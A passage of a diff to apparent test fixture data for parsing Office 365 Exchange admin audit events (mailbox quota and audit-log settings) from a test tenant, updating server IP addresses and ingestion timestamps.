bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -4100,12 +4100,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4148,7 +4148,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -4160,8 +4160,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177713400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853239200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -4181,12 +4181,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4229,7 +4229,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -4241,8 +4241,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177716200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:51\",\"ExternalAccess\":true,\"Id\":\"93d5f028-263c-45f1-dcf9-08d7ac0f2378\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853245Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:51\",\"ExternalAccess\":true,\"Id\":\"93d5f028-263c-45f1-dcf9-08d7ac0f2378\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -4262,12 +4262,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4310,7 +4310,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -4322,8 +4322,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177719400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"1eea5379-4c86-4d6f-00cf-08d7adfc0e23\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853250700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"1eea5379-4c86-4d6f-00cf-08d7adfc0e23\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -4343,12 +4343,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4391,7 +4391,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -4403,8 +4403,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177722200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853256600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -4424,12 +4424,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4461,7 +4461,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -4473,8 +4473,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177725400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853262400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -4494,12 +4494,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4531,7 +4531,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -4543,8 +4543,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177728500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853268100Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -4564,12 +4564,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4612,7 +4612,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -4624,8 +4624,8 @@ "id": 